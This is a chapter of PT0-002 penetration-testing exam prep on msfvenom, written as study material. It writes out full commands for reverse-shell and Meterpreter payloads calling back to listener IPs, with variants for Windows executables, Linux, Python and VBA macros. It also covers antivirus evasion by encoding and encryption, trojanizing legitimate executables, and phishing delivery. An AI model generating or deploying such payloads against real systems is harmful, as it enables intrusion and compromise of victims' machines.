PT0-002 | Chapter 77 of 104 | Objective 5.1

Payload Generation with msfvenom

This chapter covers msfvenom, the Metasploit Framework's payload generation tool, a critical skill for the PT0-002 exam. Msfvenom is used to create custom payloads that can be delivered to a target system to gain initial access or execute code remotely. Approximately 10-15% of exam questions touch on payload generation, encoding, and evasion techniques, making this a high-yield topic. Understanding msfvenom's architecture, command-line options, and output formats is essential for both the multiple-choice and performance-based questions on the exam.

25 min read
Intermediate
Updated May 31, 2026

Msfvenom as a Custom Ammunition Factory

Imagine you are a special operations team leader planning a covert mission. You need to breach a heavily fortified compound. You cannot use a standard assault rifle because the guards are trained to recognize its sound. Instead, you need custom ammunition—a bullet that looks like a standard round but contains a tiny explosive that activates upon impact. Your armorer, msfvenom, runs a factory that can produce any type of custom round on demand. You specify the target's weapon type (payload), the delivery mechanism (e.g., a standard rifle cartridge or a syringe dart), and any special features like self-destruct timers or encryption. Msfvenom then manufactures the round, ensuring it fits the target's weapon perfectly. You also need to bypass the compound's metal detectors, so you ask the factory to coat the bullet in a non-metallic material (encoding or encryption). Once produced, you load the round into the delivery system and fire. If the bullet is detected and blocked, you can return to the factory, modify the design (e.g., change the coating or payload type), and try again with a new round. The factory also provides a compatibility list—which weapons (payloads) work with which delivery systems (formats like EXE, DLL, or PowerShell). Without this factory, you would have to handcraft each round, a slow and error-prone process. Msfvenom automates and standardizes the creation of custom payloads, allowing you to rapidly iterate and adapt to the target's defenses.

How It Actually Works

What is msfvenom?

Msfvenom is a command-line tool that replaced msfpayload and msfencode in Metasploit. It allows penetration testers to generate payloads in various formats (e.g., EXE, DLL, PowerShell, Python) with optional encoding and encryption. The primary purpose is to produce a malicious executable or script that, when executed on the target, establishes a reverse shell, binds a shell to a port, or performs other post-exploitation actions. Msfvenom is the go-to tool for creating payloads that evade antivirus and network defenses.

How msfvenom Works Internally

Msfvenom combines a payload (the malicious code) with an output format (the container) and optionally applies encoders or encryption. The process is:

1. Select a payload from the Metasploit payload database (e.g., windows/meterpreter/reverse_tcp).
2. Specify options for that payload, such as LHOST (your IP) and LPORT (your listening port).
3. Choose an output format (e.g., exe, raw, ps1).
4. Optionally select an encoder (e.g., x86/shikata_ga_nai) to obfuscate the payload bytes.
5. Optionally specify encryption (e.g., base64 or AES256).
6. Msfvenom generates the final binary or script by combining the raw payload with the format's wrapper and applying the encoder/encryption.

Key Components, Values, and Defaults

Payloads: Msfvenom supports hundreds of payloads. Common ones for PT0-002: windows/meterpreter/reverse_tcp, linux/x86/shell_reverse_tcp, php/meterpreter_reverse_tcp. Default payload is often windows/meterpreter/reverse_tcp.

Formats: -f flag specifies output format. Examples: exe, raw, python, bash, ps1, vba, hex. Default is raw.

Encoders: -e flag selects an encoder. Common: x86/shikata_ga_nai, x86/jmp_call_additive. Default is no encoding.

Options: -p for payload, LHOST and LPORT are required for reverse payloads. LHOST default is empty (must set). LPORT default is 4444.

Bad Characters: -b flag to specify bytes that cannot appear in the payload (e.g., null bytes \x00). Msfvenom will attempt to encode to avoid them.

Encryption: --encrypt flag with values like base64, aes256, rc4. --encrypt-key sets the key.

Iterations: -i flag sets number of encoding iterations (default 1).

Architecture: -a flag (e.g., x86, x64). Default matches the payload.

Platform: --platform flag (e.g., windows, linux). Default matches the payload.

Configuration and Verification Commands

To list all payloads:

msfvenom -l payloads

To list all encoders:

msfvenom -l encoders

To list all formats:

msfvenom -l formats

To generate a simple reverse TCP payload for Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe

To generate an encoded payload with 5 iterations:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=5555 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exe

To generate a Python payload:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.10 LPORT=6666 -f python -o shell.py

To generate a VBA macro for Office:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7777 -f vba -o macro.vba

To avoid bad characters (e.g., null bytes):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8888 -b '\x00' -f exe -o no_null.exe

To generate an encrypted payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=9999 --encrypt aes256 --encrypt-key 'secret' -f exe -o encrypted.exe

How Msfvenom Interacts with Related Technologies

Msfvenom payloads are typically used with a Metasploit handler (multi/handler) to catch the connection. The handler must match the payload's stager (e.g., reverse_tcp). Msfvenom can also generate stageless payloads (e.g., windows/meterpreter_reverse_tcp with underscore) that contain the full stage, reducing network traffic but increasing size. For AV evasion, msfvenom payloads can be combined with other tools like Veil, Shellter, or custom packers. Msfvenom output can be embedded in exploit code, such as buffer overflow exploits, by using the raw format and then appending the shellcode. The --template flag allows inserting the payload into a legitimate executable (e.g., putty.exe) to create a trojan.

Advanced Features

Custom Exit Functions: EXITFUNC option can be set to process, thread, seh, or none. Default is process for Windows, which exits the whole process—useful for single-use payloads.

NOP Sled: -s flag sets NOP sled length (e.g., -s 16) and -n flag sets NOP generator (default is x86/opty2). Used in exploit development for alignment.

Small Payloads: Use -s to specify maximum size (e.g., -s 100 for space-constrained exploits).

Platform and Architecture Override: Can force a different platform/arch than the payload default, but may break functionality.

Common Pitfalls

Firewall Blocks: Reverse TCP payloads require outbound connectivity from target to attacker. Inbound connections (bind payloads) are often blocked by firewalls. Reverse payloads are preferred.

Payload Size: Large payloads may exceed exploit buffer limits. Use stageless payloads or reduce options.

Encoding Not a Panacea: Encoding can bypass signature-based AV but may still be caught by heuristic or behavioral detection. Multiple iterations and encryption improve evasion.

Mismatched Handler: The handler must use the same payload type (e.g., reverse_tcp) and the same LHOST/LPORT as the generated payload.

Verification of Payload

After generating, you can verify the payload's architecture and format using the `file` command on Linux:

file payload.exe

Check for null bytes using hexdump:

hexdump -C payload.exe | head
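The `hexdump | head` check above only shows the first few lines, and a `-f exe` file legitimately contains null bytes in its PE headers, so a bad-character check is only meaningful on `-f raw` output. As an added example (not code from the chapter), the Python below scans a raw payload file for every byte named in a `-b` argument and reports each offset; the sample bytes are constructed filler, not real shellcode.

```python
"""Scan a raw msfvenom payload for the bytes named in a -b argument.

Added example, not part of the original chapter. It assumes the payload was
written with `-f raw -o shell.bin`; the sample bytes are constructed filler,
not real shellcode.
"""
import tempfile
from pathlib import Path


def parse_badchars(spec: str) -> bytes:
    """Turn the -b argument as typed on the shell (e.g. '\\x00\\x0a\\x0d',
    quotes optional) into the byte values it names."""
    spec = spec.strip("'\"")
    parts = [p for p in spec.split("\\x") if p]
    if not parts or any(len(p) != 2 for p in parts):
        raise ValueError(f"malformed bad-character spec: {spec!r}")
    return bytes(int(p, 16) for p in parts)


def find_badchars(payload: bytes, badchars: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte) for every occurrence of a bad character."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check_payload_file(path: str, spec: str) -> list[tuple[int, int]]:
    """Scan a file produced with -f raw; an empty list means it is clean.
    Do not run this on -f exe output: PE headers contain nulls by design."""
    return find_badchars(Path(path).read_bytes(), parse_badchars(spec))


def report(hits: list[tuple[int, int]]) -> str:
    """Human-readable summary in the style of a hexdump offset listing."""
    if not hits:
        return "clean: no bad characters found"
    lines = [f"offset 0x{off:04x}: 0x{b:02x}" for off, b in hits]
    return f"{len(hits)} bad character(s) found\n" + "\n".join(lines)


def demo_scan() -> list[tuple[int, int]]:
    """Write a constructed sample to a temp file and scan it for \\x00 \\x0a \\x0d.
    Byte 5 is a newline, byte 7 a null and byte 8 a carriage return."""
    sample = b"\x90\x90\x31\xc0\x50\x0a\x68\x00\x0d"
    with tempfile.NamedTemporaryFile(suffix=".bin", delete=False) as f:
        f.write(sample)
    return check_payload_file(f.name, r"'\x00\x0a\x0d'")


if __name__ == "__main__":
    print(report(demo_scan()))
```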

Summary of Key Commands

| Task | Command |
|------|---------|
| List payloads | `msfvenom -l payloads` |
| List encoders | `msfvenom -l encoders` |
| List formats | `msfvenom -l formats` |
| Generate EXE | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=x LPORT=y -f exe -o out.exe` |
| Generate with encoding | Add `-e x86/shikata_ga_nai -i 5` |
| Avoid bad chars | `-b '\x00\x0a\x0d'` |
| Encrypt payload | `--encrypt aes256 --encrypt-key KEY` |
| Use template | `-x /path/to/legit.exe` |
| Generate raw shellcode | `-f raw` |

Walk-Through

Step 1: Select Payload and Set Options

First, choose a payload that matches the target OS and your objective. For PT0-002, common payloads are reverse TCP shells or Meterpreter. Use `-p` followed by the payload name. Set required options like LHOST (your IP address) and LPORT (listening port). For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444`. The payload defines the stager code that will connect back to your handler. If you omit LHOST, msfvenom will prompt you. The LPORT default is 4444, but you should change it to avoid detection.

Step 2: Choose Output Format

Specify the file type using `-f`. Common formats include `exe` for Windows executables, `ps1` for PowerShell scripts, `py` for Python, `raw` for shellcode, `vba` for VBA macros, and `bash` for Linux shell scripts. The format determines how the payload is wrapped. For example, `-f exe` produces a PE executable with the payload embedded. For exploit development, `-f raw` outputs the raw bytes of the payload without any wrapper. The `--list formats` command shows all supported formats.

Step 3: Apply Encoding or Encryption (Optional)

To evade antivirus, you can encode the payload using `-e` and an encoder like `x86/shikata_ga_nai`. Add `-i` for multiple iterations (e.g., `-i 5`). Encoding transforms the payload bytes to avoid signature detection. Encryption can be added with `--encrypt` (e.g., `--encrypt aes256`) and `--encrypt-key`. Note that encoding does not guarantee evasion; it only changes the byte pattern. Some encoders may introduce bad characters, so test with `-b` to specify bytes to avoid. Use `--list encoders` to see available encoders.

Step 4: Specify Bad Characters and NOP Sled

If the payload will be used in an exploit with character restrictions (e.g., buffer overflow), use `-b` to list hex bytes that cannot appear, such as null bytes (`\x00`), carriage return (`\x0d`), or newline (`\x0a`). Msfvenom will attempt to encode the payload to avoid these bytes. For exploit alignment, use `-s` to prepend a NOP sled of specified length (e.g., `-s 16`). Use `-n` to choose a NOP generator (default is `x86/opty2`). This step is critical for exploit development questions.

Step 5: Generate and Test the Payload

Run the msfvenom command with `-o` to write the output to a file. For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe`. After generation, verify the file type with `file payload.exe` and check for bad characters with `hexdump -C payload.exe | grep '00'`. Then set up a Metasploit handler using `use multi/handler`, set the same payload and options, and start listening. Execute the payload on the target to test connectivity. If it fails, adjust options (e.g., change encoder, add encryption, or use a different payload type).
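As an added example (not code from the chapter or from Metasploit), the Python below parses a msfvenom command line like the one in this walk-through, flags the mistakes the chapter warns about (a reverse payload with no LHOST, raw output written to a .exe name), classifies the payload as staged or stageless from its name, and returns the PAYLOAD/LHOST/LPORT values the multi/handler must be set to. The flag list and the slash/underscore naming rule are taken from this chapter only, not from msfvenom's full option set.

```python
"""Check a msfvenom command line for the mistakes this chapter lists and
derive the handler settings that must match it.

Added example, not from the original chapter or from Metasploit. The flag set
is limited to the options this chapter uses, and the staged/stageless rule is
the naming convention the chapter describes (slash = staged, underscore = stageless).
"""
import shlex

# Flags from the chapter that consume the next token as their value.
VALUE_FLAGS = {"-p", "-f", "-e", "-i", "-b", "-o", "-a", "-x", "-s", "-n",
               "--platform", "--encrypt", "--encrypt-key"}


def parse_msfvenom(cmdline: str) -> dict:
    """Split a command line into flags and KEY=VALUE payload options."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] != "msfvenom":
        raise ValueError("expected a command starting with 'msfvenom'")
    flags, opts = {}, {}
    tokens = iter(argv[1:])
    for tok in tokens:
        if tok in VALUE_FLAGS:
            flags[tok] = next(tokens, None)
        elif tok.startswith("-"):
            flags[tok] = True            # bare toggle such as --list-options
        elif "=" in tok:
            key, value = tok.split("=", 1)
            opts[key.upper()] = value    # LHOST=..., LPORT=..., EXITFUNC=...
        else:
            raise ValueError(f"unexpected token {tok!r}")
    return {"flags": flags, "opts": opts}


def payload_kind(name: str) -> str:
    """Classify by the last path segment: 'reverse_tcp' after a slash means a
    staged payload; 'meterpreter_reverse_tcp' with an underscore is stageless."""
    last = name.rsplit("/", 1)[-1]
    if last.startswith(("reverse_", "bind_")):
        return "staged"
    if "_reverse_" in last or "_bind_" in last:
        return "stageless"
    return "single"                      # e.g. windows/exec opens no connection


def find_problems(parsed: dict) -> list[str]:
    """Return the mistakes the chapter warns about, in command-line order."""
    flags, opts = parsed["flags"], parsed["opts"]
    payload = flags.get("-p")
    if not payload:
        return ["no payload given (-p)"]
    problems = []
    if "reverse_" in payload.rsplit("/", 1)[-1] and "LHOST" not in opts:
        problems.append("reverse payload without LHOST: nothing to call back to")
    if "LPORT" not in opts:
        problems.append("LPORT not set: the default 4444 will be used")
    if flags.get("-f", "raw") == "raw" and str(flags.get("-o", "")).endswith(".exe"):
        problems.append("-f raw written to a .exe name: raw bytes are not a PE file")
    return problems


def handler_settings(parsed: dict) -> dict:
    """Values exploit/multi/handler must be set to for this payload to connect."""
    payload = parsed["flags"]["-p"]
    return {"PAYLOAD": payload, "kind": payload_kind(payload),
            "LHOST": parsed["opts"].get("LHOST"),
            "LPORT": parsed["opts"].get("LPORT", "4444")}
```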

What This Looks Like on the Job

In a typical enterprise penetration test, a consultant is engaged to assess the security of a Windows domain environment. The tester first identifies a vulnerability, such as an unpatched SMB service (EternalBlue) or a weak web application that allows file upload. Using msfvenom, the tester generates a custom payload that will execute on the target Windows server. For example, the tester might create an EXE payload with multiple encoding iterations to bypass endpoint protection. The payload is then delivered via a phishing email attachment or by exploiting the web application's upload functionality. Once executed, the payload calls back to the tester's listener, providing a Meterpreter session. The tester then uses this session to escalate privileges, move laterally, and eventually compromise the domain controller.

In a different scenario, a tester might need to generate a payload for a Linux target, such as a web server. Using msfvenom, the tester creates a Python script that executes a reverse shell. The script is uploaded to the server via an SQL injection vulnerability. The tester sets up a netcat listener to catch the shell.

Common challenges include payloads being blocked by antivirus or application whitelisting. To overcome this, testers often use msfvenom's encryption feature or combine it with tools like Veil to create entirely new payloads. In cloud environments, testers may generate payloads that communicate over HTTPS to blend in with normal traffic. Msfvenom can generate payloads for various architectures (x86, x64, ARM) and platforms (Windows, Linux, macOS, Android).

A common mistake is forgetting to set the correct LHOST (the tester's public IP or VPN IP), leading to no callback. Another is using a bind payload when the target is behind a firewall that blocks inbound connections. Always prefer reverse payloads.

Performance-wise, msfvenom is lightweight and can generate payloads in seconds. However, for large-scale phishing campaigns, testers may automate payload generation with scripts. Misconfigurations like using the wrong payload type (e.g., staged vs stageless) can cause the handler to fail. Always verify that the handler's payload exactly matches the generated one.

How PT0-002 Actually Tests This

The PT0-002 exam tests msfvenom primarily under Objective 5.1 (Given a scenario, use tools to conduct a penetration test). You should be able to recall the syntax for generating payloads, common options, and the purpose of each flag. Expect 3-5 questions directly on msfvenom, and several more that require understanding of payload types and evasion techniques.

Common Wrong Answers:

1. Choosing the wrong format: Candidates often select -f raw when they need an executable. The exam may ask for a payload to be delivered via a phishing email; the correct format is exe or vba, not raw.
2. Confusing staged vs stageless: Questions may ask for a payload that is smaller in size. Stageless payloads (e.g., windows/meterpreter_reverse_tcp with underscore) are larger but do not require a second stage. Staged payloads (e.g., windows/meterpreter/reverse_tcp with slash) are smaller initially. The exam expects you to know the naming convention.
3. Misunderstanding encoding: Encoding does not guarantee AV evasion; it only changes the byte pattern. The exam may ask which technique is best for evading signature-based AV. Encoding is a partial answer; encryption or custom packers are more effective.
4. Forgetting LHOST: Reverse payloads require LHOST to be set. The exam may present a command without LHOST and ask why it fails. The answer is that LHOST is missing.

Specific Numbers and Terms:

- Default LPORT for reverse_tcp is 4444.
- Common encoder: x86/shikata_ga_nai.
- Bad characters flag: -b.
- Iterations flag: -i.
- Template flag: -x.
- Exit function option: EXITFUNC (default process).

Edge Cases:

- When generating a payload for a 64-bit target, use the x64 architecture payload (e.g., windows/x64/meterpreter/reverse_tcp). The -a x64 flag can be used but is often redundant.
- For Android payloads, use android/meterpreter/reverse_tcp and format apk.
- For macOS, use osx/x64/shell_reverse_tcp.

How to Eliminate Wrong Answers:

- If the question mentions avoiding null bytes, look for the -b flag in the answer.
- If the question wants to reduce payload size, consider staged payloads or stageless vs staged.
- If the question is about AV evasion, look for encoding, encryption, or template injection.
- Always read the payload name carefully: slashes indicate staged, underscores indicate stageless.

Key Takeaways

Msfvenom replaces msfpayload and msfencode; use `-p` for payload, `-f` for format, `-e` for encoder, `-i` for iterations.

Default LPORT for reverse TCP payloads is 4444; always set LHOST for reverse payloads.

Common payloads: windows/meterpreter/reverse_tcp, linux/x86/shell_reverse_tcp, php/meterpreter_reverse_tcp.

Use `-b` to specify bad characters (e.g., `-b '\x00\x0a'`).

Encoding (e.g., x86/shikata_ga_nai) obfuscates payload bytes but does not guarantee AV evasion.

Staged payloads (slash) are smaller but require a second stage; stageless (underscore) are larger but self-contained.

The `-x` flag can inject payload into a legitimate executable (template).

Use `--encrypt` and `--encrypt-key` for encryption (e.g., AES256).

Always match the handler's payload and options to the generated payload.

Verify payload with `file` and `hexdump` commands.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

Staged Payloads (e.g., windows/meterpreter/reverse_tcp)

Small initial stager size (typically < 1KB)

Requires a second stage download from the handler

More network traffic (two connections)

More likely to be detected due to the second stage connection

Naming convention uses forward slash (/)

Stageless Payloads (e.g., windows/meterpreter_reverse_tcp)

Larger initial payload (tens of KB)

Contains the entire stage in one piece

Single connection, less network chatter

Less likely to trigger network-based detection

Naming convention uses underscore (_)

Watch Out for These

Mistake

Msfvenom can generate payloads that are completely undetectable by antivirus.

Correct

No payload is 100% undetectable. Encoding and encryption can bypass signature-based detection but may still be caught by heuristic or behavioral analysis. AV vendors constantly update signatures. Msfvenom's encoding only obfuscates the byte sequence; it does not change the payload's behavior.

Mistake

You must use an encoder to use msfvenom.

Correct

Encoding is optional. Many payloads work without encoding. Encoding is only needed to avoid bad characters or to evade signature-based detection. The default is no encoding.

Mistake

The default LPORT for all reverse payloads is 4444.

Correct

While 4444 is the default for many reverse TCP payloads, some payloads may have different defaults. Always check with `msfvenom -p [payload] --list-options`. The exam typically tests the common default of 4444.

Mistake

Msfvenom payloads can only be used with Metasploit handlers.

Correct

Msfvenom generates standard shellcode that can be used with other listeners, such as netcat for a reverse shell. However, Meterpreter payloads require a Metasploit handler to process the Meterpreter protocol. Raw shellcode can be used in custom exploits.

Mistake

The `-f raw` format produces an executable file.

Correct

`-f raw` outputs the raw bytes of the payload without any file wrapper. It is not executable on its own. It is used for embedding in exploit code or for further processing. To get an executable, use `-f exe`.


Frequently Asked Questions

What is the difference between staged and stageless payloads in msfvenom?

Staged payloads (e.g., windows/meterpreter/reverse_tcp) send a small stager first, which then downloads the larger stage. Stageless payloads (e.g., windows/meterpreter_reverse_tcp) include the entire payload in one piece. Staged payloads are smaller and useful when size is constrained, but they require two connections. Stageless payloads are larger but only need one connection. On the exam, staged payloads use a forward slash in the name, stageless use an underscore.

How do I avoid null bytes in a msfvenom payload?

Use the `-b` flag followed by the hex bytes to avoid, e.g., `-b '\x00'` to avoid null bytes. Msfvenom will attempt to encode the payload so that those bytes do not appear. You can specify multiple bytes, e.g., `-b '\x00\x0a\x0d'`. If encoding fails, msfvenom will report an error.

Can I use msfvenom to generate a payload for a Linux target?

Yes, msfvenom supports multiple platforms. Use `-p linux/x86/shell_reverse_tcp` for a Linux reverse shell, or `-p linux/x64/shell_reverse_tcp` for 64-bit. Output formats include `elf`, `python`, `bash`, `perl`, etc. For example: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o shell.elf`.

What is the default exit function for Windows payloads?

The default EXITFUNC is `process` for Windows payloads. This means the payload will exit the entire process when it finishes. Other options include `thread` (exit only the thread), `seh` (structured exception handler), and `none` (do not exit). The default ensures the process terminates cleanly.

How do I generate a VBA macro with msfvenom?

Use `-f vba` to generate a VBA macro. For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f vba -o macro.vba`. The output contains VBA code that can be inserted into an Office document. The macro will execute the payload when the document is opened with macros enabled.

What is the purpose of the `-x` flag in msfvenom?

The `-x` flag specifies a template executable to inject the payload into. For example, `-x /path/to/putty.exe` will create a new executable that looks like putty.exe but contains the payload. This is used to create trojanized binaries that may evade detection by appearing as legitimate software.

Why does my reverse payload not call back?

Common reasons: LHOST is not set or set incorrectly (use your public IP or VPN IP), LPORT is blocked by a firewall, the payload format is incorrect for the target OS, or the target cannot reach your listener. Ensure your listener is running and that you are using the exact same payload and options. Also check that the target can make outbound connections to your IP and port.

